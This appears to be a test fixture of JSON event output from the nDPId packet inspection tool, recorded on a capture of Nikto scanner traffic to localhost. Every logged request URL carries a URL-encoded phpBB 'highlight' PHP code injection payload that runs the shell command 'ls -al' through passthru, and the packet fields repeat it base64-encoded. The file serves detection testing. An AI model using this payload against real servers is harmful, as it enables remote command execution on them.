00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} 
-01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} 
-01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": 
{"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
